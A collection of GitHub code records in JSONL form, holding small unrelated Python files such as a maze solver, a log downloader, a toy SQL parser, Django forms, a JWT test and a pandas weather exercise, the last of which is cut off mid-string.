+{"seq_id":"28330020234","text":"adj = []\ns = ['+++++++++++++++++++++++',\n 'S + + +',\n '+ +++ + ++++ + ++++++ +',\n '+ + + + + + +',\n '+ ++++++++ +++ + + ++++',\n '+ + + + + + ++',\n '++++ + +++ + +++++ + +',\n '+ + + + +',\n '+ ++++++ + ++++++ +++++',\n '+ + + +',\n '+++++++++++++++++++++F+']\n\nfor t in s:\n adj.append(list(t))\n\nprint(adj)\ncol = len(adj[0])\nrow = len(adj)\nprint('Row = %d' % row)\nprint('Column = %d' % col)\n\nqueue = []\n\n\ndef stringify(i, j):\n s = ''\n s = s + str(i) + '-' + str(j)\n return s\n\n\ndef maze():\n i = 0\n while i < len(adj):\n for j in range(len(adj[i])):\n print(adj[i][j], end=\" \")\n print()\n i += 1\n\n\ndef maze_solver(i, j):\n maze()\n print()\n print()\n # print('Remaining Path Options => %s' % queue)\n adj[i][j] = '.'\n count = 0\n record = []\n if adj[i + 1][j] == ' ':\n count += 1\n record.append(stringify(i + 1, j))\n\n if adj[i - 1][j] == ' ':\n count += 1\n record.append(stringify(i - 1, j))\n\n if adj[i][j + 1] == ' ':\n count += 1\n record.append(stringify(i, j + 1))\n\n if adj[i][j - 1] == ' ':\n count += 1\n record.append(stringify(i, j - 1))\n\n if adj[i + 1][j] == 'F':\n adj[i + 1][j] = 'X'\n maze()\n print('We Have Reached in Our Destination (%d, %d)' % (i + 1, j))\n quit()\n\n if adj[i - 1][j] == 'F':\n adj[i - 1][j] = 'X'\n maze()\n print('We Have Reached in Our Destination (%d, %d)' % (i - 1, j))\n quit()\n\n if adj[i][j + 1] == 'F':\n adj[i][j + 1] = 'X'\n maze()\n print('We Have Reached in Our Destination (%d, %d)' % (i, j + 1))\n quit()\n\n if adj[i][j - 1] == 'F':\n adj[i][j - 1] = 'X'\n maze()\n print('We Have Reached in Our Destination (%d, %d)' % (i, j - 1))\n quit()\n\n if count == 1:\n l = record[0].split('-')\n r, s = (int(l[0]), int(l[1]))\n maze_solver(r, s)\n\n if count > 1:\n queue.extend(record)\n l = queue.pop(0).split('-')\n r, s = (int(l[0]), int(l[1]))\n maze_solver(r, s)\n\n else:\n l = queue.pop(0).split('-')\n r, s = (int(l[0]), int(l[1]))\n maze_solver(r, s)\n\n\nprint('Initial Stage')\np = 0\nwhile p < len(adj):\n for q in range(len(adj[p])):\n if adj[p][q] == 'S':\n print('Fun Begins at (%d, %d)' % (p, q))\n maze_solver(p, q)\n else:\n pass\n\n p += 1\n","repo_name":"simon619/Maze-Solving-Using-Breadth-First-Search","sub_path":"SimonsMaze.py","file_name":"SimonsMaze.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70414991687","text":"import urllib.request\nimport os\nimport pathlib\nimport gzip\n\nimport setup as s\n\n# ##################################################################\n# pwaFileImport\n# ##################################################################\ndef pwaFileImport(webRetrieve=False, unzipfiles=True, maxFiles = 5):\n \"\"\"\n Import files froms website https://www.cs.huji.ac.il\n Logs (of real life) of set of job times.\n Retrieve file catalog : address setted in constant s.URL_CATALOG_PWA\n reads this file which contains the url addresses of the time files\n and each file is retreived in the folder FOLDER_ZIPPEDLOG,\n to be unzipped in the folder FOLDER_PWA\n input\n :param webRetrieve: True : retreive files from website.\n :param unzipfiles : True : unzip files from zippedLog folder to PWA folder\n :param maxFiles : number of files to retreive from website.\n use 0 to retreive all files\n \"\"\"\n tabFiles = []\n\n #-------------------------------\n # log directory\n # s.folder creates requested directories if not exists\n # curDir = os.path.abspath(os.curdir)\n #-------------------------------\n zipDir = s.folder(s.FOLDER_ZIPPEDLOG)\n logDir = s.folder(s.FOLDER_PWA)\n \n #-------------------------------\n # Web resource web --> zipDir\n #-------------------------------\n if webRetrieve:\n # read distant file\n fichierNom = s.URL_CATALOG_PWA # url of files log catalog \n req = urllib.request.Request(url=fichierNom) \n fichierId = urllib.request.urlopen(req)\n\n # put the list on a list tabFiles\n contentsLine = fichierId.readline().decode('utf-8')\n while contentsLine:\n tabFiles.append(contentsLine.rstrip(\"\\n\")) # erase \\n caracter from the string \n contentsLine = fichierId.readline().decode('utf-8')\n\n # close the file\n fichierId.close()\n \n # now i have my list of pwa gz logs\n n=0\n for file in tabFiles:\n n+=1\n if (n > maxFiles or maxFiles==0):\n break\n fileInfo = pathlib.Path(file)\n # destFile = os.path.join(zipDir, fileInfo.name)\n destFile = zipDir+\"/\"+fileInfo.name\n urllib.request.urlretrieve(file, destFile)\n print(\"file ========> \"+destFile+\" retrieved.\")\n\n if unzipfiles == True:\n unzipGZ(fileInfo.name, zipDir, logDir)\n# ##################################################################\n# unzipGZ\n# ##################################################################\ndef unzipGZ(fileNameGZ, fromDir, destDir):\n \"\"\"\n Unzip the file named fromDir+fileNameGZ\n in the folder destDir. 
\n \"\"\"\n #\n fromFile = fromDir+s.sepDir()+fileNameGZ\n destFile = destDir+s.sepDir()+fileNameGZ.rstrip(\".gz\")\n #\n print(\"Unzipping file %s in %s\" % (fromFile, destDir))\n #\n src = gzip.GzipFile(fromFile, 'rb')\n sRead = src.read()\n src.close()\n d = open(destFile, 'wb')\n d.write(sRead)\n d.close()\n print(\"Unzipped.\")\n\n# ##################################################################\n# pwaFileRead\n# ##################################################################\ndef pwaFileRead(fileName):\n \"\"\"\n Reads the log file according to the predefined format,\n to create an instance (set of times)\n called from matrix.py\n \"\"\"\n with open(fileName, 'r') as f:\n text = f.read()\n # END WITH \n times = []\n for line in text.split('\\n'):\n line = line.strip()\n if not(line) or line[0] == \";\":\n continue\n # END IF\n jobId, submitTime, waitTime, runTime, nbProc, avgCPUtime, mem, reqProc, reqTime, reqMem, status, uId, gId, appId, queueId, partitionId, precedingJob, timefromPrecedingJob = [float(x) for x in line.split()]\n if runTime != 0:\n # times += [runTime]\n times.append(runTime)\n # END IF\n # END FOR\n return times\n# ##################################################################\n# pwaFileChoice():\n# ##################################################################\ndef pwaFileChoice(chooseMode = None):\n \"\"\"\n finds the files contained in the \"FOLDER_PWA\" directory,\n and proposes to choose them, or not (for test instance creation).\n :Param chooseMode : None Asc for use the current files / 1 Always answer YES, 0 Always answer NO, \n Returns the list of selected files as a list files[]\n \"\"\"\n files = []\n logDir = s.folder(s.FOLDER_PWA)\n content = os.listdir(logDir)\n for item in content:\n if chooseMode == None:\n r = int(input(\"Use this file %s ? (1 yes 0 no) : \" % (item)))\n else:\n r=chooseMode\n # END IF \n if r == 1:\n files.append(logDir+s.sepDir()+item)\n # END IF\n # END FOR\n print(files)\n return files\n\n##TO TEST THIS SCRIPT\n##pwaFileImport(True, True)\n##logTimes = pwaFileRead(logFolder()+\"/NASA-iPSC-1993-3.1-cln.swf\")\n##print(logTimes)\n##pwaFileChoice()\n\n\n","repo_name":"fColas68/appCmax","sub_path":"pwa.py","file_name":"pwa.py","file_ext":"py","file_size_in_byte":5051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"15511874337","text":"# 常规写法 获取字符串中的数字\ns = 'shidi33d6662bb99fff6d5'\nfor i in s:\n # 判断当前字符是不是一个数字 TF\n if i.isnumeric():\n print(i)\n\n# 正则匹配\nimport re # 内置 不需要下载\n# findall(匹配规则,匹配内容) 返回形式是列表\nres = re.findall('\\d+',s)\nprint(res)\n\n\n","repo_name":"xiaoguiy/python-scrapy","sub_path":"10-正则(上)/上课代码/04-正则概述.py","file_name":"04-正则概述.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"7402966182","text":"n=int(input())\r\np_list=[]\r\n\r\nfor i in range(n):\r\n w,h=map(int,input().split())\r\n p_list.append([w,h])\r\n \r\nfor i in p_list:\r\n grade=1\r\n for j in p_list:\r\n if i[0] < j[0] and i[1] < j[1]:\r\n grade+=1\r\n print(grade)","repo_name":"parkminji03/Study_kt","sub_path":"11.브루트포스/7568.py","file_name":"7568.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"25758875291","text":"# Importing libraries\nimport re\nimport storage as db\nimport sys\n\nstorage = db.storager()\n\n# Parser process:\n# Parsing words -- DONE!\n# Exit function -- DONE!\n# Create function -- DONE!\n# Insert function -- DONE!\n# Select function -- edit select in storager with order\n# Delete finction -- edit select in storager with condition\n\n# Function to parse words into commands and find command type if it is possible\ndef parse(self, words):\n command = re.findall(r'\\S+', words)\n print(command)\n command_type = command[0]\n command_type = command_type.upper()\n symbols = ['(', ')', ',', '.', ';']\n\n # Find command type and arguments or print command error\n if command_type not in Parser.COMMANDS:\n print(f\"Command '{command_type}' not found!\")\n command_exec = 0\n\n elif command_type == 'EXIT': \n print('Stopping program...')\n Parser.exit_command = True\n sys.exit() \n\n elif command_type == 'CREATE':\n table_name = command[1]\n if re.match(Parser.NAMES, table_name) and table_name.upper() not in Parser.COMMANDS and table_name.upper() not in Parser.SPECIAL_WORDS:\n columns = []\n i = 2\n\n # Deleting excessive symbols\n for indx, word in enumerate(command):\n exch = word\n first = exch[0]\n last = exch[-1]\n #print(exch)\n #print(first, last)\n if first in symbols:\n exch = exch[1:]\n last = exch[-1]\n if last in symbols:\n exch = exch[:-1]\n command[indx] = exch\n #print(exch)\n #print(command[indx])\n\n # Searching indexing columns and mark them to indexed_flag = True\n while i < len(command):\n if i + 1 < len(command):\n indexed_word = command[i + 1]\n if indexed_word.upper() == 'INDEXED':\n indexed_flag = True\n else:\n indexed_flag = False\n columns.append([command[i], indexed_flag])\n i += int(indexed_flag)\n else:\n indexed_flag = False\n columns.append([command[i], indexed_flag])\n i += 1\n print(columns)\n command_exec = storage.create_db(table_name, columns)\n else:\n print('Invalid table name!')\n\n elif command_type == 'INSERT':\n values = []\n i = 2\n # Detecting table_name\n if command[1].upper() not in Parser.COMMANDS and command[1].upper() not in Parser.SPECIAL_WORDS:\n table_name = command[1]\n elif command[2].upper() not in Parser.COMMANDS and command[2].upper() not in Parser.SPECIAL_WORDS:\n table_name = command[2]\n i += 1\n\n # Deleting excessive symbols\n for indx, word in enumerate(command):\n exch = word\n first = exch[0]\n last = exch[-1]\n #print(exch)\n #print(first, last)\n if first in symbols:\n exch = exch[1:]\n last = exch[-1]\n if last in symbols:\n exch = exch[:-1]\n command[indx] = exch\n #print(exch)\n #print(command[indx])\n\n while i < len(command):\n values.append(command[i])\n i += 1\n print(values)\n command_exec = storage.insert_db(table_name, values)\n\n elif command_type == 'SELECT':\n columns = []\n condition = []\n order = []\n i = 1\n # Detecting selection columns\n from_pos = 0\n where_pos = 0\n order_pos = 0\n\n # Deleting excessive symbols\n for indx, word in enumerate(command):\n exch = word\n first = exch[0]\n last = exch[-1]\n #print(exch)\n #print(first, last)\n if first in symbols:\n exch = exch[1:]\n last = exch[-1]\n if last in symbols:\n exch = exch[:-1]\n command[indx] = exch\n #print(exch)\n #print(command[indx])\n\n while i < len(command):\n if command[i].upper() == 'FROM':\n from_pos = i\n if command[i].upper() == 'WHERE':\n where_pos = i\n if command[i].upper() == 'ORDER_BY':\n order_pos = i\n i += 1\n\n for i in range(1, from_pos):\n columns.append(command[i])\n table_name = 
command[from_pos + 1]\n if where_pos != 0 and order_pos != 0:\n for i in range(where_pos + 1, order_pos):\n condition.append(command[i])\n elif where_pos != 0 and order_pos == 0:\n for i in range(where_pos + 1, len(command)):\n condition.append(command[i])\n if order_pos != 0:\n for i in range(order_pos + 1, len(command)):\n order.append(command[i])\n print(f\"t_n {table_name}\")\n print(f\"columns {columns}\")\n print(f\"condition {condition}\")\n print(f\"order {order}\")\n command_exec = storage.select_db(table_name, columns, condition, order)\n\n elif command_type == 'DELETE':\n condition = []\n where_pos = 0\n i = 2\n\n for indx, word in enumerate(command):\n exch = word\n first = exch[0]\n last = exch[-1]\n #print(exch)\n #print(first, last)\n if first in symbols:\n exch = exch[1:]\n last = exch[-1]\n if last in symbols:\n exch = exch[:-1]\n command[indx] = exch\n #print(exch)\n #print(command[indx])\n \n # Detecting table_name\n if command[1].upper() not in Parser.COMMANDS and command[1].upper() not in Parser.SPECIAL_WORDS:\n table_name = command[1]\n elif command[2].upper() not in Parser.COMMANDS and command[2].upper() not in Parser.SPECIAL_WORDS:\n table_name = command[2]\n i += 1\n print(f\"table_name -- {table_name}\")\n print(f\"len(command) -- {len(command)}\")\n print(f\"i -- {i}\")\n while i < len(command):\n if command[i].upper() == 'WHERE':\n where_pos = i\n i += 1\n if where_pos != 0:\n for i in range(where_pos + 1, len(command)):\n condition.append(command[i])\n print(f\"condition -- {condition}\")\n command_exec = storage.delete_db(table_name, condition)\n \n return command_exec\n\n\n# Parser class\nclass Parser:\n NAMES = r\"[a-zA-Z][a-zA-Z0-9_]*\"\n COMMANDS = {'CREATE', 'INSERT', 'SELECT', 'DELETE', 'EXIT'}\n SPECIAL_WORDS = {'INDEXED', 'INTO', 'FROM', 'WHERE', 'ORDER_BY'}\n\n def __init__(self):\n input_command = ''\n input_accept = True\n exit_command = False\n print('Use \"EXIT\" command to stop this program')\n\n # Command input\n while not exit_command:\n while input_accept:\n input_command += ' ' + input('>>').strip()\n if ';' in input_command:\n for words in input_command.split(';'):\n if words:\n #print(words)\n parse(self, words)\n input_accept = False\n input_accept = True\n\n #command = re.findall(r'\\S+', words)\n #print(command)\n\nif __name__ == '__main__':\n parser = Parser()\n","repo_name":"AntoshaGodx/aaf-labs-2021","sub_path":"shevchenko_fi-92_kozlovska_fi-92/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":7619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37415723791","text":"\"\"\"2427. Number of Common Factors\"\"\"\n\n\nclass Solution:\n def commonFactors(self, a: int, b: int) -> int:\n count = 1\n i = 2\n\n while i <= min(a, b):\n if a % i == 0 and b % i == 0:\n count += 1\n i += 1\n\n return count\n","repo_name":"linzeyang/leetcode-solutions","sub_path":"easy/2427.py","file_name":"2427.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2216404079","text":"from torch.utils.data import Dataset\nimport numpy as np\n\n\nclass DrumDataset(Dataset):\n def __init__(self, data_list):\n self.data_list = data_list\n\n def __len__(self):\n return len(self.data_list)\n\n def __getitem__(self, idx):\n curr_data = self.data_list[idx]\n skel = curr_data['skeleton']\n note = curr_data['note']\n vel = curr_data['vel']\n mt = curr_data['mt']\n tempo = curr_data['tempo']\n fname = curr_data['midi_f']\n genre = curr_data['genre']\n note_density_idx = curr_data['note_density_idx']\n vel_contour = curr_data['vel_contour']\n time_contour = curr_data[\"time_contour\"]\n # time_contour =\n\n # skel = skel[ np.newaxis, :]\n # note = note[np.newaxis, :]\n # vel = vel* 127 // 4\n\n # range1 = 2\n # range2 = 100\n\n # mt = (range2 * (mt + (range1 /2))) / range1 - (range2/2) + 50\n\n # vel = vel / 32\n # mt = mt / 100\n\n n_inst = np.sum(note, 0)\n n_inst[n_inst > 1] = 1\n\n n_inst = int(np.sum(n_inst)) - 1\n\n return {\n \"skel\": skel,\n \"note\": note,\n \"vel\": vel,\n \"mt\": mt,\n \"tempo\": tempo,\n \"fname\": fname,\n \"genre\": genre,\n \"note_density_idx\": note_density_idx,\n \"vel_contour\": vel_contour,\n # \"vel_accent\": vel_accent,\n \"time_contour\": time_contour,\n \"n_inst\": n_inst\n # \"time_mode\": time_mode\n # \"deco\": deco\n }\n","repo_name":"kyungyunlee/PocketVAE","sub_path":"src/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"}
+{"seq_id":"34552216105","text":"def def_casos(T):\r\n casos_valor = []\r\n casos_keys = []\r\n for i in range(T):\r\n value = int(input(f\"Ingrese #Caso {i+1}: \"))\r\n while(value>200 or value<0):\r\n value = int(input(\"Porfavor, ingrese un #Caso entre 0 y 200: \")) \r\n if(value>=0 and value<=200):\r\n casos_valor.append(value)\r\n casos_keys.append(f\"Caso #{i+1}\")\r\n\r\n return casos_keys, casos_valor\r\n\r\ndef ciclo_bleatrix(N, casos_keys):\r\n \"\"\"\r\n x = []\r\n for i in range(0,10):\r\n x.append(i)\r\n \"\"\"\r\n validador = [0,1,2,3,4,5,6,7,8,9]\r\n valores_keys = []\r\n print(N)\r\n\r\n for valor in N:\r\n i=0\r\n compara = []\r\n while((compara!=validador)):\r\n i+=1\r\n x = valor * i\r\n for digits in str(x):\r\n compara.append(int(digits))\r\n compara = list(dict.fromkeys(compara))\r\n compara.sort()\r\n if(compara == validador):\r\n valores_keys.append(x)\r\n break\r\n elif((valor==0)):\r\n valores_keys.append(\"INSOMNIA\")\r\n break\r\n\r\n return dict(zip(casos_keys, valores_keys))\r\n \r\n\r\nif __name__ == \"__main__\":\r\n T = int(input(\"Introducir cantidad de casos a probar: \"))\r\n while(T is None or T>100 or T<1):\r\n T = int(input(\"Porfavor, ingrese un valor entre 1 y 100: \"))\r\n\r\n T_par = def_casos(T)\r\n print(ciclo_bleatrix(T_par[1], T_par[0]))\r\n ","repo_name":"FrancoTruffa/technicaltest","sub_path":"exercise_3.py","file_name":"exercise_3.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"36707527496","text":"class Solution:\n def add(self, a: int, b: int) -> int:\n \"\"\"\n 不用加法运算做加法\n :param a:\n :param b:\n :return:\n 复杂度分析:时间复杂度O()\n \"\"\"\n x = 0xffffffff\n a = a & x\n b = b & x\n while b != 0:\n # a = a ^ b\n # b = (a & b) << 1 & x\n # 上面和下面的写法不同,计算结果也不相同,并排写法能同时运算结果,互不影响,分别计算非进位和和进位和\n a, b = (a ^ b), (a & b) << 1 & x\n print(\"a:{}\".format(a))\n print(\"b:{}\".format(b))\n return a if a <= 0x7fffffff else ~(a ^ x) # 若补码 a 为负数( 0x7fffffff 是最大的正数的补码 ),需执行 ~(a ^ x) 操作,将补码还原至 Python 的存储格式,~(a ^ x) 是将 32 位以上的位取反,1 至 32 位不变。\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.add(a=1, b=2))","repo_name":"Cecilia520/algorithmic-learning-leetcode","sub_path":"cecilia-python/剑指offer/chapter-7/Add.py","file_name":"Add.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"zh","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"}
+{"seq_id":"24850120477","text":"\"\"\"\n创建csv对象\ncsv.writer(fileobj)\n放入一个可迭代类型对象,写在一行,每一个元素是一列\ncsv.writerow(iterable)\n\n放入一个可迭代类型的元素,这个元素中的每一个子元素也必须可迭代\n每一个子元素占一行,子元素又会被拆开占据多列,长度取决于自身\ncsv.writerows(Iterable(Iterable))\n\n\"\"\"\nimport csv\n\n# 创建流对象\nfile = open(\"demo07.csv\", mode=\"w\", encoding=\"utf-8\")\n# 创建csv对象\ncsv_writer = csv.writer(file)\n# 写入内容\ncsv_writer.writerow([\"a\", \"b\", \"c\", \"d\", \"e\"])\n\n# csv_writer.writerows([[1, 2, 3], \"world\", \"say\", \"byebye\"])\n# 关闭流\nfile.close()\n","repo_name":"xvjingcheng/superman","sub_path":"千峰的每天/第十三天12.27/代码/Day13/07.csv写入文件.py","file_name":"07.csv写入文件.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23870524793","text":"#!/bin/env python3\nimport jwt\n\nfrom cryptography.x509 import load_pem_x509_certificate\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.backends import default_backend\n\npayload_data = {\n \"iss\": \"0d674da4ac7611eda8f78f77fa521b6e\"\n}\n\n# key_file = open('server.key', 'rb+')\n# private_bytes = key_file.read()\n# private_key = serialization.load_pem_private_key(\n# private_bytes, None, backend=default_backend()\n# )\n# cert_file = open('server.crt', 'rb+')\n# cert_str = cert_file.read()\n# cert_obj = load_pem_x509_certificate(cert_str)\n# public_key = cert_obj.public_key()\n# token = jwt.encode(payload_data, private_key, algorithm=\"RS256\")\n# print(jwt.decode(token, public_key, algorithms=['RS256', ]))\n\nmy_secret = 'guest'\n\ntoken = jwt.encode(\n payload=payload_data,\n key=my_secret,\n algorithm=\"HS256\"\n)\nprint(token)\n\n# print(jwt.decode(token, key=my_secret, algorithms=['HS256', ]))\n","repo_name":"relaypro-open/dog_api_python","sub_path":"src/jwt_test.py","file_name":"jwt_test.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"19215730048","text":"from django import forms\nfrom djmoney.forms import MoneyField\nfrom django.forms import ModelForm, Form\n\nfrom .models import Fazenda, FazendaMedia\nimport re\n\nestados = (('',''),('AC','Acre AC'),('AL','Alagoas AL'),('AP','Amapá AP'),\n ('AM','Amazonas AM'),('BA','Bahia BA'),('CE','Ceará CE'),\n ('DF','Distrito Federal DF'),('ES','Espírito Santo ES'),\n ('GO','Goiás GO'),('MA','Maranhão MA'),('MT','Mato Grosso MT'),\n ('MS','Mato Grosso do Sul MS'),('MG','Minas Gerais MG'),('PA','Pará PA'),\n ('PB','Paraíba PB'),('PR','Paraná PR'),('PE','Pernambuco PE'),('PI','Piauí PI'),\n ('RJ','Rio de Janeiro RJ'),('RN','Rio Grande do Norte RN'),\n ('RS','Rio Grande do Sul RS'),('RO','Rondônia RO'),('RR','Roraima RR'),\n ('SC','Santa Catarina SC'),('SP','São Paulo SP'),('SE','Sergipe SE'),\n ('TO','Tocantins TO'))\n\nculturas = (('Lavoura','Lavoura'),('Pecuária','Pecuária'),('Dupla Aptidão','Dupla Aptidão'))\n\nclass FazendaForm(ModelForm):\n class Meta:\n model = Fazenda\n fields = ('nome', 'municipio', 'estado', \n 'area_total', 'area_aberta',\n 'cultura', 'infra', 'maquinario',\n 'local_ref', 'coordenada', 'valor',\n 'obs', 'encaminhado', 'oferta')\n\n nome = forms.CharField(label='nome', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n \n municipio = forms.CharField(label='municipio', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'})) \n\n estado = forms.CharField(label='estado', widget=forms.Select({\n \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'},\n choices=estados))\n\n area_total = forms.IntegerField(label='area_total',widget=forms.NumberInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n\n area_aberta = forms.IntegerField(label='area_aberta',widget=forms.NumberInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n\n cultura = forms.CharField(label='cultura', widget=forms.Select(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'},\n choices=culturas))\n\n infra = forms.CharField(label='infra', widget=forms.Textarea(\n attrs={ \"autocomplete\":\"off\", \n \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2',\n 'cols': '30',\n 'rows': '4'}))\n\n maquinario = forms.CharField(label='maquinario', widget=forms.Textarea(\n attrs={ \"autocomplete\":\"off\", \n \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2',\n 'cols': '30',\n 'rows': '4'}))\n\n local_ref = forms.CharField(label='local_ref', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n \n coordenada = forms.CharField(label='coordenada', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n \n valor = forms.Form('valor',)\n\n obs = forms.CharField(label='obs', widget=forms.Textarea(\n attrs={ \"autocomplete\":\"off\", \n \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2',\n 'cols': '30',\n 'rows': '4' }))\n \n encaminhado = forms.CharField(label='encaminhado', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n\n oferta = forms.CharField(label='oferta', widget=forms.TextInput(\n attrs={ 
\"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n\n\nclass UploadMedia(forms.Form):\n class Meta:\n model = FazendaMedia\n fields = ('imagem', 'video', 'audio')\n\n imagens = forms.FileField(label='imagem', required=False, \n widget=forms.ClearableFileInput(attrs={'multiple': True,}))\n \n videos = forms.FileField(label='video', required=False, \n widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\n audios = forms.FileField(label='audio', required=False, \n widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\nclass SearchForm(forms.Form):\n \n estado = forms.ChoiceField(\n widget=forms.Select(attrs={'class':'form-control',}), #'style':r'padding-left: calc(50% - 1em)' Para momdile\n choices=estados, \n initial=\"\",\n required=False)\n \n municipio = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2',\n 'autocomplete':'off',}),\n required=False)\n\n area_min = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2',\n 'autocomplete': 'off',}), \n required=False)\n\n area_max = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2',\n 'autocomplete': 'off',\n 'oninput':\"this.form.range_area_max.value=this.value\"}), \n required=False)\n \n valor_min = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2',\n 'autocomplete': 'off',}),\n required=False)\n\n valor_max = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2', \n 'autocomplete': 'off',}),\n required=False,\n )","repo_name":"gconelhero/Fazendas","sub_path":"cadastro/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23801200794","text":"import pandas as ps\n\"\"\"Readng the given csv and putting NaN values in place of **\"\"\"\ndata=ps.read_csv('6153237444115dat.csv',na_values=['*', '**', '***', '****', '*****', '******'])\n\n\n#PROBLEM FIRST\nprint(\"ANS OF FIRST PROBLEM\")\n\n\"\"\"- How many rows is there in the data?\n- What are the column names?\n- What are the datatypes of the columns?\n- What is the mean Fahrenheit temperature in the data? (`TEMP` column)\n- What is the standard deviation of the Maximum temperature? (`MAX` column)\n- How many unique stations exists in the data? (`USAF` column)\"\"\"\n\n\n\nprint('Total no. of row:',data.__len__())\nname=data.columns\nprint('Total columns ')\nfor i in name:\n print(i)\nprint('Datatypes:',data.dtypes)\nprint('mean od temp:',data['TEMP'].mean())\nprint('deviation of MAX:',data['MAX'].std())\nprint('unique',data['USAF'].unique())\n\n#PROBLEM TWO\nprint(\"ANS OF SECOUND\")\n\"\"\" - Select from the `data` columns `USAF, YR--MODAHRMN, TEMP, MAX, MIN` and assign them into a new variable called `selected`\n - Remove all rows from `selected` that has NoData in column `TEMP` using `dropna()` -function\n - Convert the Fahrenheit temperatures from `TEMP` into a new column `Celsius` using the conversion formula\n - Round the values in `Celsius` to have 0 decimals (**don't** create a new column --> update the current one)\n - Convert the `Celsius` values into integers (**don't** create a new column --> update the current one)\"\"\"\n\nselected=ps.concat([data['USAF'],data['YR--MODAHRMN'],data['TEMP'],data['MAX'],data['MIN']],axis=1)\n\nselected=selected.dropna(subset=['TEMP'])\n\nfor i in selected['TEMP']:\n convert(i)\n\n\nselected['Celsius']=a\nb=selected['Celsius'].round()\nselected.update(b)\na.clear()\nfor i in selected['Celsius']:\n a.append(int(i))\nselected['Celsius']=a\n\nprint(selected)\n\n#THIRD\nprint('ans of two')\n\"\"\"- Divide the selection into two separate datasets:\n - Select all rows from `selected` DataFrame into variable called `kumpula` where the `USAF` code is `29980`\n - Select all rows from `selected` DataFrame into variable called `rovaniemi` where the `USAF` code is `28450`\n- Save `kumpula` DataFrame into `Kumpula_temps_May_Aug_2017.csv` file (CSV format) \n - separate the columns with `,`\n - use only 2 decimals in the floating point numbers\n- Save `rovaniemi` DataFrame into `Rovaniemi_temps_May_Aug_2017.csv` file (CSV format) \n - separate the columns with `,`\n - use only 2 decimals in the floating point numbers\"\"\"\n\nkumpula=selected[selected['USAF']==29980]\nrovaniemi=selected[selected['USAF']==28450]\n\nkumpula.to_csv('Kumpula_temps_May_Aug_2017.csv',index=False,float_format='%.2f')\nrovaniemi.to_csv('Rovaniemi_temps_May_Aug_2017.csv',index=False,float_format='%.2f')\n#FORTH\nprint(\"ANS OF FORTH(part 1)\")\n\"\"\"**Part 1**\n\n- What was the median temperature in:\n - Helsinki Kumpula?\n - Rovaniemi?\"\"\"\nprint(kumpula['TEMP'].median())\nprint(rovaniemi['TEMP'].median())\nprint(\"ANS OF FORTH(part 2)\")\n\"\"\"\n- Select from `rovaniemi` and `kumpula` DataFrames such rows from the DataFrames where ``YR--MODAHRMN`` values are from May 2017 (see hints for help)\nand assign them into variables `rovaniemi_may` and `kumpula_may`\n- Do similar procedure for June and assign those values into variables `rovaniemi_june` and `kumpula_june`\n- Using those new subsets print the mean, min and max temperatures for both places in May and 
